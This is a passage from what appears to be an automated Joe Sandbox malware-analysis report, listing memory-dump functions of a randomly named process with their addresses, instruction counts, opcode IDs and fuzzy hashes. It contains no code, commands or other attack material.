                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8dc4164264464568aef4be8e799dc32ca685780b2d1c9ee0e9020fe111f67303
                                    • Instruction ID: 0509bb57c21254fe91c9582adb86bb45e921e7e155568775bdc2c837b79c693e
                                    • Opcode Fuzzy Hash: 8dc4164264464568aef4be8e799dc32ca685780b2d1c9ee0e9020fe111f67303
                                    • Instruction Fuzzy Hash: D3218E3194C68A9FE745EB6888992AD7BB0FF26740F0405BAC49CD7093DE28E448C382
                                    Function 00007FF887AF0A01 Relevance: .1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b35da4ecdf0bbf3af85510921b473b4bd242164d5907a6221b21400796ac5fd6
                                    • Instruction ID: e4587f2648410022f9dc132596193f2ab281287c54936ea98afaca0c5c19846c
                                    • Opcode Fuzzy Hash: b35da4ecdf0bbf3af85510921b473b4bd242164d5907a6221b21400796ac5fd6
                                    • Instruction Fuzzy Hash: 0F118F7195950E9FE790EB68888A2FE7BF0FF58390F4045B6D428C71A6EE38A544C741
                                    Function 00007FF887B048B5 Relevance: .1, Instructions: 65COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fb0c8be5321b997e1338ae37449b1450634514539bb39c5401a790fdd5037f9d
                                    • Instruction ID: b816912eaef839af398f799079e36a419b27d89058b82794e308c1aa41bf200c
                                    • Opcode Fuzzy Hash: fb0c8be5321b997e1338ae37449b1450634514539bb39c5401a790fdd5037f9d
                                    • Instruction Fuzzy Hash: F211BB3094864E9FDB88EF68C4592FD3BB1FF69351F0005BAD40DC6292CA38A184C741
                                    Function 00007FF887B08641 Relevance: .1, Instructions: 65COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc039f3f6bd312dc4b417d79fc2bc89e90c0c98623977befd6b52091f55d2ea9
                                    • Instruction ID: 3aa6daa99a7722c3a57f60136a85984bece2cf5a2082f2f3739b0de74ab9484c
                                    • Opcode Fuzzy Hash: fc039f3f6bd312dc4b417d79fc2bc89e90c0c98623977befd6b52091f55d2ea9
                                    • Instruction Fuzzy Hash: 94118831D5891D8ECB98EE5894916FDB3F2FB28350F00107AD04EF3281CE78AA81CB00
                                    Function 00007FF887B025B1 Relevance: .1, Instructions: 65COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f00c980d259d106e2e1da85f0edf5ed6d4a84aa70a259d32307ffeca320131da
                                    • Instruction ID: f43c53527cbdd33589aedd6cdff864318a478a3c8936eb5e02ba7a9bf052a931
                                    • Opcode Fuzzy Hash: f00c980d259d106e2e1da85f0edf5ed6d4a84aa70a259d32307ffeca320131da
                                    • Instruction Fuzzy Hash: E11176709482498FDB88EF18C4962FD3BA1FF58354F1106BEE80AD3291CB38A494CB81
                                    Function 00007FF887B06F95 Relevance: .1, Instructions: 64COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d58127e0538d6eee2ea9cbc1b5f0606fe939290a03d0d1cfc40b98ab48e117a
                                    • Instruction ID: 2088a5e35ac9130773261c6d64bc20c75a88d660d8b32f90dc9140f139a4caf4
                                    • Opcode Fuzzy Hash: 2d58127e0538d6eee2ea9cbc1b5f0606fe939290a03d0d1cfc40b98ab48e117a
                                    • Instruction Fuzzy Hash: F711AC7094864E8FEB98EF6884592BD7BB1FF68354F0405BAD40DD7192DE38A484C741
                                    Function 00007FF887B0DA90 Relevance: .1, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 67409364d3b207896622080ec85fd67ae67affb9ddfa46bb241460da4aa7161b
                                    • Instruction ID: ef66061294fbf236a82f0d1938ff594f2f98ae50b5824700910076e26501a168
                                    • Opcode Fuzzy Hash: 67409364d3b207896622080ec85fd67ae67affb9ddfa46bb241460da4aa7161b
                                    • Instruction Fuzzy Hash: 6711C13194DA4A8EDB58EA6580405FE73E1FFA8391F440A3AD04EC31C2CE2CB946C791
                                    Function 00007FF887B04819 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 316aa3686d645c7bbe7fe18fd4e46f049449fe9e3ead9f3a9ff0b32ce3de8eca
                                    • Instruction ID: a3e0f1dac31c90dd8328313da41993541e2ed33826fb8051c208b9a7843d9357
                                    • Opcode Fuzzy Hash: 316aa3686d645c7bbe7fe18fd4e46f049449fe9e3ead9f3a9ff0b32ce3de8eca
                                    • Instruction Fuzzy Hash: 9B11AC30948B8E9FDB99EF6884592FD3BB1FF69350F0009BED419C7192DA39A484C781
                                    Function 00007FF887AF2444 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction ID: 8104230c822e8d42a133faf1990b27dbb0c08ff3e6aa511581e7ef6d106d3613
                                    • Opcode Fuzzy Hash: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction Fuzzy Hash: 8711E431D9852A8BEB68EB10D862BFDB275FF55341F4011BAC01EA7192DE786984CF40
                                    Function 00007FF887B12B00 Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff560e4ad393aad9a6c1a43bcfdde4a947be8ff0fa395f42e1e463780ed4f18c
                                    • Instruction ID: 12250c162d29617a790e3ef5becc8b2aa80b81b0952e9cccfee7dba1d5012f27
                                    • Opcode Fuzzy Hash: ff560e4ad393aad9a6c1a43bcfdde4a947be8ff0fa395f42e1e463780ed4f18c
                                    • Instruction Fuzzy Hash: CD11C431A5CA4A4EDB58EE61C0015FE73E1FF98380F400636E04EC35C2DE2CB446C661
                                    Function 00007FF887B04DD9 Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4be1a9317b6ffe1dbd179dc756813b08580a6b0c716bf0c93b87e9e29179b938
                                    • Instruction ID: bda9223fb0be9b52ec194707c128943c91a375fcd4325b559190aa1c98c293fb
                                    • Opcode Fuzzy Hash: 4be1a9317b6ffe1dbd179dc756813b08580a6b0c716bf0c93b87e9e29179b938
                                    • Instruction Fuzzy Hash: AE11EC70D4DA898FDB49DA6488A92BC3BB1FF5A314F0504BAC019C65A2CA296444C702
                                    Function 00007FF887B0D90E Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 516793ccfee58ddd6b8aad5e349d2c633ada04bd30cb0b9becc195adb119470a
                                    • Instruction ID: 9c240f180d762e654b4044a93ec46ef00343921835d4d169c7f03fcc66477251
                                    • Opcode Fuzzy Hash: 516793ccfee58ddd6b8aad5e349d2c633ada04bd30cb0b9becc195adb119470a
                                    • Instruction Fuzzy Hash: A7112B3124D54A8FE7099E54D4107ED73E1FF59391F04423AD51EC32C1CA6DA961CB91
                                    Function 00007FF887AF112D Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction ID: 4718bdf0cb6beabcf079bd5324f65511833f2986c31d06875be413e7ed9fc2ef
                                    • Opcode Fuzzy Hash: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction Fuzzy Hash: 95119D70948A498FEB99EB68C4592BE7BF0FF6A354F0005BED40AC6192EB295544C701
                                    Function 00007FF887AF0EFD Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0edfa57a97ab173481c42df210fdf1b0b4dccaf22afe32097646ba4f73bea11
                                    • Instruction ID: c7e2d43ca4fad26880ac801edf301cf3492ab99a0ae2fbf5630d24c57a18854a
                                    • Opcode Fuzzy Hash: e0edfa57a97ab173481c42df210fdf1b0b4dccaf22afe32097646ba4f73bea11
                                    • Instruction Fuzzy Hash: 81114F32E5890E8FEB54EB54C896BEEB7B2FF54340F104275C01AD7296CE786985CB81
                                    Function 00007FF887B1297E Relevance: .1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c6fb42bee7d2a15b0a9d02763c6a103506fd07a152a9748d906dafdbd59d633a
                                    • Instruction ID: 42b8ff985c0e4a0e452c9a2db015660e74d6e72cd9f826c8ea21628bdfa4b54d
                                    • Opcode Fuzzy Hash: c6fb42bee7d2a15b0a9d02763c6a103506fd07a152a9748d906dafdbd59d633a
                                    • Instruction Fuzzy Hash: 8A11663124954A8FE7189E98C4102ED73A1FF993A1F04013AE80AC32C1DA2CA992C7A1
                                    Function 00007FF887B05149 Relevance: .1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fef94b1b94257c62c2af7e1d3f9bec20038e74b4775ae79a1b430df08f92a42e
                                    • Instruction ID: 70d7f199fe133ad5bfb3d1d1368f92383360bf1a715598ca500ecc6c5b7744d5
                                    • Opcode Fuzzy Hash: fef94b1b94257c62c2af7e1d3f9bec20038e74b4775ae79a1b430df08f92a42e
                                    • Instruction Fuzzy Hash: 41119A7098868A8FEB99EB6488596FD7BF1FF19340F0404BAC409D6592DE38A444C702
                                    Function 00007FF887AFC920 Relevance: .1, Instructions: 57COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 016bc5073f6e5b90b5eea3894c6608b724ccfc8e9281a19f94661099ae524103
                                    • Instruction ID: db6ab685aa029c01ca7b9c9d48c8394192ced1e9707136705a6f1f6749b0fa0f
                                    • Opcode Fuzzy Hash: 016bc5073f6e5b90b5eea3894c6608b724ccfc8e9281a19f94661099ae524103
                                    • Instruction Fuzzy Hash: 5611483094864E8FDB4AEB68C4992FD7BB0FF19344F1105BBE419CA192EF396544CB52
                                    Function 00007FF887B07601 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3a367d47a28c1e1df8f6ae39206788607cecaca910b3d126278a6a4dded6e27
                                    • Instruction ID: fbe23a1d2fe8540c587445d83a00ea839ee3846970fc1e35240a1506dd178370
                                    • Opcode Fuzzy Hash: f3a367d47a28c1e1df8f6ae39206788607cecaca910b3d126278a6a4dded6e27
                                    • Instruction Fuzzy Hash: 9B11653495C64A8FEB41EB78C84C6AEBBF5FF25341F0809B6D41AD7061DA78A184C751
                                    Function 00007FF887B029A1 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 589a09f7baf4a4a9e30f9c5d82bd7804f7d9099d911e7a155a7972c4923058a0
                                    • Instruction ID: 4bcc2bf7966f487c049ee2436f986273991aa62c838b2fc253c5107640a7f93e
                                    • Opcode Fuzzy Hash: 589a09f7baf4a4a9e30f9c5d82bd7804f7d9099d911e7a155a7972c4923058a0
                                    • Instruction Fuzzy Hash: E901803095C54E8FEB81EBB488896FD7BF1FF19354F0148B6D418C7052EA349188C741
                                    Function 00007FF887DC0981 Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1713943587.00007FF887DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887dc0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c19fbf17c9eab79523ab22025b983478168744d34b11591f0a014a4a09601607
                                    • Instruction ID: d86427f18b62ccf1f016c25afd3e0b6fd4522c97667a0cea8f86d20b08ffd539
                                    • Opcode Fuzzy Hash: c19fbf17c9eab79523ab22025b983478168744d34b11591f0a014a4a09601607
                                    • Instruction Fuzzy Hash: 67018E3098964E8FEB88EF14C8593BD7BA1FF98380F1442BAD41AC6196DE35A594C741
                                    Function 00007FF887B070CD Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25eb8ee009972f6f92ed88daf28aa3fa3e82278fecabd46a32187f1ed6056da6
                                    • Instruction ID: 7831e9ca1ca13de746f41df372a8d4d596eb885e53586d7b985871170b8539de
                                    • Opcode Fuzzy Hash: 25eb8ee009972f6f92ed88daf28aa3fa3e82278fecabd46a32187f1ed6056da6
                                    • Instruction Fuzzy Hash: 9311CE3094864E8FEB99EF24C45A2BDBBB1FF68350F0845BAD409C61D2DE39A444C781
                                    Function 00007FF887B04EFD Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: acb8f9bbcc4ddd4b1f23d34dad386629c5aab6cf850e95508270a8c6673118f5
                                    • Instruction ID: f316be67fa0f1746e6689e61a6488d229ee54d1042dfd54c942e20553f4c7ad4
                                    • Opcode Fuzzy Hash: acb8f9bbcc4ddd4b1f23d34dad386629c5aab6cf850e95508270a8c6673118f5
                                    • Instruction Fuzzy Hash: 3A119E7094864A8FEB88EB6484992FE7BF0FF59354F0008BAD41DD7192DF39A584C741
                                    Function 00007FF887AFBBD5 Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d91f4ed13f5b123b4e8b0e0b811821105d4e47b41903058db2b0d677f8fef7ed
                                    • Instruction ID: 9382feac21d988c4f4d3d0744b65ac02a9dabd7b71b848aa9b5b91f50b1884da
                                    • Opcode Fuzzy Hash: d91f4ed13f5b123b4e8b0e0b811821105d4e47b41903058db2b0d677f8fef7ed
                                    • Instruction Fuzzy Hash: 8C11AD3094864D8FDB48EF64C4592FE7BB0FF19308F5108BAD419C61A1EF75A990C701
                                    Function 00007FF887B07DD1 Relevance: .1, Instructions: 54COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2562ff51c570f64fd086652fd75643966b9c39ec52d26752835e2088dfed777f
                                    • Instruction ID: 82813d61a52387be6463ef9e176f64b829fcd2c523de52c102b9d4ac53f8ae65
                                    • Opcode Fuzzy Hash: 2562ff51c570f64fd086652fd75643966b9c39ec52d26752835e2088dfed777f
                                    • Instruction Fuzzy Hash: 1C01CC308896498FDF49EF24C4592BD7BB1FF29340F1508BEC40ACB192DB39A850C701
                                    Function 00007FF887B050BD Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a586435c56f1b99ffecd3adcc4307651ab8f19043e5b00caf6dd420c62a2421
                                    • Instruction ID: a92008e52985945b4adde6bd75baa057f187dc10b50e409662b35d1506046c82
                                    • Opcode Fuzzy Hash: 9a586435c56f1b99ffecd3adcc4307651ab8f19043e5b00caf6dd420c62a2421
                                    • Instruction Fuzzy Hash: F411AC3194868E8FEB48EB64C8596FD7BF1FF18304F0008BED419D6592EE79A594C742
                                    Function 00007FF887AF2EF1 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction ID: 3fdee1bac1e0d20afbea624f46670d00f1fef208c682df278251b831df135aa9
                                    • Opcode Fuzzy Hash: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction Fuzzy Hash: A7017C719A864A8FE751EB24884A2AD7BF0FF19350F0549B6D408CA0A2EA38A494C701
                                    Function 00007FF887AF05D8 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction ID: 05e038c3ab73c80b738f9f246ee58f4a844a900ae3c5f8f46b9ebe28e7790557
                                    • Opcode Fuzzy Hash: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction Fuzzy Hash: 8101883094990E8FEB88EF24C05A6BE77B1FF58348F20087AD40EC7191CA36A590CB40
                                    Function 00007FF887B02445 Relevance: .0, Instructions: 48COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d18389f2fd015d5c3d3718ebe5aa2b32d310222ecdb0bb5948f3371a99f009d4
                                    • Instruction ID: 5e05406b0693b8232d215dbbe9f57efabb0668240f0578a540eecba768914183
                                    • Opcode Fuzzy Hash: d18389f2fd015d5c3d3718ebe5aa2b32d310222ecdb0bb5948f3371a99f009d4
                                    • Instruction Fuzzy Hash: 8C01D43084924A8FDB59EFA0C4552FD3BB1FF49344F0108BED50DD6192DE39A594C701
                                    Function 00007FF887AFAD68 Relevance: .0, Instructions: 47COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56ad1d2e9b774d037ddbd5210cedba54952d30f01b0fef05c8434e30445566d4
                                    • Instruction ID: 64d0c6dcc93dc373735b1970d61a1e26d68d4ec539c80d5b7bb27bab6f6979e4
                                    • Opcode Fuzzy Hash: 56ad1d2e9b774d037ddbd5210cedba54952d30f01b0fef05c8434e30445566d4
                                    • Instruction Fuzzy Hash: D701563095890E8FEB98EF68C44A2BE77F0FF18345F10087AE41ED2291DE39A595CB01
                                    Function 00007FF887AFC3E0 Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f1179d4407d19d259bbb871401ed97f93fd8d466149bcc2bd7a6bdbd4af8e85
                                    • Instruction ID: 824c43d600d0ce04e615eec8eba552ef65f901e94213fe0f4cbac91edfbcde59
                                    • Opcode Fuzzy Hash: 8f1179d4407d19d259bbb871401ed97f93fd8d466149bcc2bd7a6bdbd4af8e85
                                    • Instruction Fuzzy Hash: 7101163099490E8FEB88EF68C45A2FE77F1FF18305F10087AE81EC6191EA35A594CB01
                                    Function 00007FF887AFAD28 Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b67aef02540b656d3c350b132db454af9351e5f2a951c660dadbed1683589866
                                    • Instruction ID: 67ecf35a27761114343d9ebcc6de0d8d4f819ba5876dfd8addb9c03667fef6ad
                                    • Opcode Fuzzy Hash: b67aef02540b656d3c350b132db454af9351e5f2a951c660dadbed1683589866
                                    • Instruction Fuzzy Hash: 19017C3094890E8FDB98FF64C04A2BE77B2FF58356F50447AE41EC6194CA35A194CB41
                                    Function 00007FF887AFA989 Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
